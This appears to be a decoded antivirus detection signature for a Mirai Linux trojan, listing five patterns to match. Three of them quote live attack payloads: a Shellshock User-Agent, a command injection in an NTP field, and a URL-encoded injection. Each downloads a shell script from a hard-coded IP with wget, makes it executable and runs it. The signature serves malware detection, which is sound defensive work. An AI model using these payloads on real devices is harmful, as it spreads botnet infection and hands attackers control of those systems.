VIRUS NAME: Unix.Trojan.Mirai-9856974-0
TDB: Engine:51-255,Target:6
LOGICAL EXPRESSION: (0|1|2|3|4)>3,4
 * SUBSIG ID 0
 +-> OFFSET: ANY
 +-> SIGMOD: NONE
 +-> DECODED SUBSIGNATURE:
User-Agent: () { :; }; echo ; /bin/bash -c "cd /tmp; wget http://45.133.1.133/lolol.sh; chmod 777 lolol.sh; sh lolol.sh"
 * SUBSIG ID 1
 +-> OFFSET: ANY
 +-> SIGMOD: NONE
 +-> DECODED SUBSIGNATURE:
C1=ON&cmd=cgi_ntp_time&f_ntp_server=`cd /tmp; wget http://45.133.1.133/lolol.sh; chmod 777 lolol.sh; sh lolol.sh`
 * SUBSIG ID 2
 +-> OFFSET: ANY
 +-> SIGMOD: NONE
 +-> DECODED SUBSIGNATURE:
GET /check_browser?lang=cd%20/tmp%20wget%20http://45.133.1.133/lolol.sh%20sh%20/tmp/kh%27$/lolol.sh HTTP/1.1
 * SUBSIG ID 3
 +-> OFFSET: ANY
 +-> SIGMOD: NONE
 +-> DECODED SUBSIGNATURE:
POST /cgi-bin/login.cgi HTTP/1.1
 * SUBSIG ID 4
 +-> OFFSET: ANY
 +-> SIGMOD: NONE
 +-> DECODED SUBSIGNATURE:
POST /AdminService/urest/v1/LogonResource HTTP/1.1
